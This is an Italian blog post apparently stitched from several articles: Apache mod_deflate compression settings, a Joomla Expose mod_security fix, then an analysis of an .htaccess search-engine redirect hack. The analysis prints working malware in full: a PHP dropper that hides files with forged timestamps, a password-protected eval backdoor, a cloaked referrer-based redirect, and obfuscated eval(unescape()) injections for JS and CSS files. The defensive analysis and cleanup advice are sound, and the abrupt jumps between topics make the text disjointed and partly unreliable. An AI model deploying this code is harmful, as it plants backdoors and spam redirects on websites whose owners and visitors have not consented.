Quest’oggi vi illustro come poter attivare e ottimizzare la compressione tramite Mod Deflate di Apache quando attiva nel proprio spazio in Hosting.

Attivando tale compressione unita ad apposite modifiche al sito per ottimizzarlo al meglio (attivazione del Minify, attivazione della cache, etc) sono riuscito ad ottenere una compressione da 266Kb originari della mia Home Page a 16 K come dimostra l’immagine sottostante realizzata utilizzando il plugin “YSlow“.

Grazie a ciò e alle modifiche apportate al sito attualmente “capn3m0.org” è passato da “Grade F” a “Grade C” di Yahoo riuscendo a ottimizzare ed ottenere A e B in tutte le categorie dove è possibile intervenire.

Di seguito vi incollo il link al file “.htaccess” da utilizzare per abilitare la compressione HTTP tramite Deflate.

Download .htaccess – Compressione HTTP ON

Qui invece, potete leggere direttamente il codice da utilizzare:

SetOutputFilter DEFLATE
AddOutputFilter DEFLATE text/html text/plain text/xml text/css application/javascript application/x-javascript application/x-httpd-php application/rss+xml application/atom_xml text/javascript
# Netscape 4.x has some problems...
BrowserMatch ^Mozilla/4 gzip-only-text/html
 
# Netscape 4.06-4.08 have some more problems
BrowserMatch ^Mozilla/4\.0[678] no-gzip
 
# MSIE masquerades as Netscape, but it is fine
 BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
 
# NOTE: Due to a bug in mod_setenvif up to Apache 2.0.48
# the above regex won't work. You can use the following
# workaround to get the desired effect:
BrowserMatch \bMSI[E] !no-gzip !gzip-only-text/html
 
# Don't compress images
SetEnvIfNoCase Request_URI \
\.(?:gif|jpe?g|png)$ no-gzip dont-vary

Problema

I problemi che si riscontrano utilizzando detto componente in Hosting che hanno abilitato il “Mod_Security” sono principalmentdue due:

1) Mancato accesso all’interfaccia di gestione dal Pannello di Controllo del Joomla;

2) Errore nell’upload dei file tramite l’interfaccia Flash.

Perché?

Entrambe le problematiche nascono dalla presenza in diverse cartelle del file “.htaccess” contenente due istruzioni che, se abilitate nel Server in Hosting, consentono di disabilitare il “Mod_Security” per evitare che blocchi il passaggio di dati/file tra l’interfaccia Flash e il Server.

Il codice di questo file è il seguente:

SecFilterEngine Off
SecFilterScanPOST Off

Sul mio ed altri Hosting tale possibilità è disabilitata in quanto le misure di Sicurezza devono (giustamente) essere sempre attive e, quindi, il file “.htaccess” genera il manifestarsi di errori “500 Internal Server Error” e il mancato funzionamento degli applicativi/componenti dove esso è posizionato.

Al fine di risolvere le due problematiche precedentemente indicate, quindi, è necessario eliminare il file .htaccess dai seguenti percorsi:

/components/com_expose/expose/manager/amfphp
/components/com_expose/expose/manager/upload

Per chi volesse leggerlo ecco il link: http://www.capn3m0.org/2008/10/htaccess-hacking-redirect-per-chi-arriva-dai-motori-di-ricerca/

In questo articolo vi informo che ho individuato la prima chiamata che viene fatta al sito vittima tramite una vulnerabilità di Remote File Inclusione (RFI).

Chi attacca fa interpretare al sito questo codice Php che una volta elaborato dalla vittima crea dei file chiamati “nomegofer.php” in varie aree del sito cosicché chi esegue tale azione può richiamarli quando vuole per fare in modo che il sito venga nuovamente infettato. Questo il codice:

< ?php
error_reporting(1);
global $HTTP_SERVER_VARS;
$START = time();
$WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0);
function my_fwrite($f,$data) {
    global $CURFILE;
    $file_mtime = @filemtime($f);
    $file_atime = @fileatime($f);
    $dir_mtime = @filemtime(@dirname($f));
    $dir_atime = @fileatime(@dirname($f));
    if ($file_h = @fopen($f,"wb")){
        @fwrite($file_h,$data);
        @fclose($file_h);
        if ($file_mtime){
            @touch($f,$file_mtime,$file_atime);
        }elseif(@filemtime($CURFILE)){
            @chmod($f,@fileperms($CURFILE));
            @touch($f,@filemtime($CURFILE),
            @fileatime($CURFILE));
            @chgrp($f,@filegroup($CURFILE));
            @chown($f,@fileowner($CURFILE));
        };
        if ($dir_mtime)
            @touch(@dirname($f),$dir_mtime,$dir_atime);
        return $f;
    }else{
        return '';
    };
};
function ext($f){
    return substr($f, strrpos($f, ".") + 1);
};
function walkdir($p,$func='_walkdir',$l=0){
    global $START;
    global $WD_TIMEOUT;
    global $FL;
    $func_f = "{$func}_f";
    $func_d = "{$func}_d";
    $func_s = "{$func}_s";
    $func_e = "{$func}_e";
    if ($dh = @opendir("$p")){
        if (function_exists($func_s)) {
            if ($func_s($p,$l)) return 1;
        };
        while ($f = @readdir($dh)){
            if (time() - $START >= $WD_TIMEOUT[$l] )
                break;
            if ($f == '.' || $f == '..' )
                continue;
            if (@is_dir ("$p$f/") )
                walkdir("$p$f/",$func,$l+1);
            if (@is_dir ("$p$f/") && function_exists($func_d))
                $func_d("$p$f/",$l);
            if (@is_file("$p$f" ) && function_exists($func_f))
                $func_f("$p$f" ,$l);
        };
        closedir($dh);
        if (function_exists($func_e))
            $func_e($p,$l);
    };
};
function r_cut($p){
    global $R;
    return substr($p,strlen($R));
};
function say($t) {
    echo "$t\n";
};
function testdata($t) {
    say(md5("testdata_$t"));
};
$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME'];
echo "<pre>";
testdata('start');
$fe = ext($CURFILE);
if (!$fe)
    $fe = 'php';
$FN = "namogofer.$fe";
function _walkdir_s($d,$l) {
    global $FCNT;
    $FCNT = array('fn' => '','dir' => 0,'file' => 0,'simtype' => 0);
};
function _walkdir_d($d,$l) {
    global $FCNT; $FCNT['dir' ]++;
};
function _walkdir_f($f,$l) {
    global $FCNT;
    $FCNT['file']++;
    if (ext($f) == ext($CURFILE))
        $FCNT['simtype']++;
};
function _walkdir_e($d,$l) {
    global $C,$FCNT,$FN;
    if ($C[$l]<7){
        if (my_fwrite("$d$FN",str_repeat("\n",100).str_repeat(' ',150).base64_decode('+').str_repeat(' ',150)."\n".str_repeat("\n",100))){
            $C[$l]++;
            $FCNT['fn'] = r_cut("$d$FN");
            say(implode("\t",$FCNT));
        };
    };
}; 
 
walkdir("$R/");
testdata('end');
echo "</pre>";
 ?>

la porzione encodata alla riga 97 una volta decodificata appare così:

< ?php
error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) {
    echo "$t\n";
};
function testdata($t) {
    say(md5("testdata_$t"));
};
echo "<pre>";
testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
        eval($code);
    }else{
        testdata('f');
    };
}else{
    testdata('pass');
};
testdata('end');
echo "</pre>";
?>

Per proteggervi da tale hacking vi invito ad utilizzare script di Sicurezza quali PHPIDS di cui potete trovare una recensione a questo link.

Per pulire i vostri file in seguito ad un eventuale attacco fate riferimento alla procedura indicata nella prima parte di questo articolo.

Tale file “.htaccess” nella sua semplicità risulta essere furbo poiché ragiona in due modi:

1. Se non è presente alcun “.htaccess” ne crea uno all’insaputa dell’utente con il codice scritto dalla Riga 101 in poi così anche se viene aperto il file non viene visto il codice;
2. Se invece esiste già un file “.htaccess” provvedere ad aggiungere 101 righe vuote in coda e successivamente il codice senza modificare quanto già presente. Lo scopo è sempre quello di evitare che l’utente si accorga dell’infezione nel caso apra il file.

Va inoltre fatto notare che, per come è strutturato risulta essere “furbo” anche perché l’hacking è visibile solo a chi proviene dai Motori di Ricerca e, quindi, a coloro che con molta probabilità non conoscono il sito (visto che lo cercano sui Motori). Il Webmaster che probabilmente digita l’indirizzo del proprio dominio invece di ricercarlo non si accorgerebbe del problema ma continuerebbe a vedere il proprio sito correttamente caricato e navigabile.

I Codici Utilizzati

Nel dettaglio il codice del file “.htaccess” che viene creato:

1
2
3
4
5
6
7
8
9
10
11

# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^[url]http://[/url]([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|
alltheweb|f ireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|
search_word|buscar|text|words|su|q t|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|
search_word|buscar|text|words|su|q t|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/wysiwyg/rujez/uhe/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c

Tale codice indica che se il referrer (l’indirizzo di provenienza) del visitatore che richiama la pagina è uno dei Motori di Ricerca indicati rediretta il visitatore all’Url:

/admin/wysiwyg/rujez/uhe/ex3/t.htm

L’indirizzo dove viene posizionata la pagina “t.htm” varia sempre a seconda degli script e delle cartelle presenti nello spazio della vittima.

I Motori di Ricerca che vengono verificati sono i seguenti:

• Google
• Msn
• Yahoo
• Live
• Ask
• DogPile
• My Web Search
• Yandex
• Rambler
• Aport
• Mail
• GoGo
• Poisk
• All The Web
• FireBall
• FreeNet
• Abacho
• Wanadoo
• Free
• Club-Internet
• Alice Ads
• Alice
• Skynet
• Terra
• Ya
• Orange
• Clix
• Terravista
• Gratis-Ting
• Suomi24

La pagina a cui rimanda appare come un “clone” di Blogger dove vengono inseriti testi generati casualmente.

Eccone un esempio:

Esempio di hacking via .htaccess (Pagina t.htm)

Oltre questo, una volta infettato un sito questo hacking provvede ad aggiungere in tutti i file “.css” e “.js” un codice incapsulato che provvede a ricreare costantemente il file “.htaccess” qualora venga eliminato.

Nei file Javascript (.js) viene inserito il seguente codice:

1
2
3

/* a0b4df006e02184c60dbf503e71c87ad */
 ;eval(unescape(’%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%32%36%30%34%36%32%38%3B%20%4A%53%53%33%20%3D%20%27%2F%77%69%6B%69%2F%46%43%4B%65%64%69%74%6F%72%2F%65%64%69%74%6F%72%2F%69%6D%61%67%65%73%2F%6F%66%61%64%65%6C%69%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%77%69%6B%69%2F%46%43%4B%65%64%69%74%6F%72%2F%65%64%69%74%6F%72%2F%69%6D%61%67%65%73%2F%6F%66%61%64%65%6C%69%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'));
/* a995d2cc661fa72452472e9554b5520c */

Mentre nei Fogli di Stile (.css) viene inserito questo codice:

1
2
3

/* a0b4df006e02184c60dbf503e71c87ad */
body { margin-top: expression(eval(unescape(’%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%32%36%30%34%36%32%38%3B%20%4A%53%53%33%20%3D%20%27%2F%77%69%6B%69%2F%46%43%4B%65%64%69%74%6F%72%2F%65%64%69%74%6F%72%2F%69%6D%61%67%65%73%2F%6F%66%61%64%65%6C%69%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%77%69%6B%69%2F%46%43%4B%65%64%69%74%6F%72%2F%65%64%69%74%6F%72%2F%69%6D%61%67%65%73%2F%6F%66%61%64%65%6C%69%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) }
/* a995d2cc661fa72452472e9554b5520c */

In alcune situazioni è capitato di individuare del codice inserito anche nelle pagine Php (.php;.php3).Tale codice serve a colui che attacca per verificare la presenza di vulnerabilità nella vittima e, in particolare, per verificare che eventuali inclusioni esterne vengano elaborate correttamente.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

< ?php
error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) { echo “$t\n”; };
function testdata($t) {     say(md5(”testdata_$t”)); };
echo “ ”; testdata(’start’);
if (md5($_POST["p"])==”aace99428c50dbe965acc93f3f275cd3?){
     if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],”rb”),$HTTP_POST_FILES["f"]["size"])){
 eval($code);
 } else{ testdata(’f');
 };
 }     else{testdata(’pass’); };
testdata(’end’);
echo ”  “; ?>

Il codice presente nei CSS e nei JavaScript è stato decodificato e in chiaro appare così:

1
2
3
4
5
6
7
8
9

if (!document.getElementById(’JSSS’)){
JSS1 = 59;
JSS2 = 159180;
JSS3 = ‘/admin/wysiwyg/rujez/dummy.htm’;
var js = document.createElement(’script’);
js.setAttribute(’src’, ‘/admin/wysiwyg/rujez/check.js’);
js.setAttribute(’id’, ‘JSSS’);
document.getElementsByTagName(’head’).item(0).appendChild(js)
};

Infine viene creato un file “check.js” contenente il seguente codice:

1
2

(Math.random()*60 < JSS1) && document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|
alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\./)

Come Lavora

Dalle verifiche che ho potuto effettuare per ora risulta che non vi è una tecnica costante di intrusione ma i siti vengono hackerati sfruttando le falle presenti quindi si va dall'XSS (Cross Site Scripting) all'RFI (Remote File Inclusion) all'hacking (probabilmente tramite Brute Force ) dell'account Ftp con successivo upload dei file.

Nel dettaglio lo script effettua una primo tentativo di attacco tentando una HTTP Injection nel tentativo di fare includere nelle pagine della vittima un Url ad una pagina contenente il solo codice:

< ?php echo md5("just_a_test"); ?>

Questo semplice codice servirà a chi esegue l'Hacking per verificare la presenza della vulnerabilità o meno. Se tramite l'Http Injection individua nella pagine della vittima la stringa MD5 della parola "just_a_test" avrà conferma che la vittima è vulnerabile in quanto elabora correttamente pagine esterne.

Se tale test da esito positivo effettuerà una seconda HTTP Injection facendo eseguire uno Script Php che provvederà a scansionare tutte le cartelle e file presenti nel sito creando i file ".htaccess" ed eseguendo l'edit di ogni file ".css" e ".js".

Potete trovare il dettaglio dei codici che vengono sfruttati nei seguenti link:

WhyRon 1

WhyRon 2

Come Rimuovere il Malware?

Attualmente, al fine di proteggersi e pulire il proprio sito è consigliabile effettuare le seguenti operazioni:

1. Ricercare in tutti i file del proprio sito la stringa "a0b4df006e02184c60dbf503e71c87ad" ed eliminare il codice da tutte le pagine dove viene trovato. Eseguire la stessa ricerca cercando la stringa "aace99428c50dbe965acc93f3f275cd3" ed eliminare i file dove viene trovato. Il software PowerGrep (Link Rapidshare) in questo caso è molto utile.
2. Eliminare tutti i file e cartelle che si è sicuri non facciano riferimento al proprio sito. (Il file "t.htm" contenente la pagina malevola viene inserito all'interno di cartelle con nomi che apparentemente sembrano essere generati random)
3. Effettuare una scansione del proprio sito al fine di individuare la vulnerabilità che ha permesso tale intrusione. In questo caso consiglio di utilizzare uno degli Scanner disponibili on line come, ad esempio, Acunetix.
4. Effettuare un cambio dei dati o della sola password Ftp de Sito.

Spero che tali informazioni siano state utili e vi informo che provvederò a mantenere aggiornato questo post man mano che scopro maggiori informazioni riguardo tale Hacking.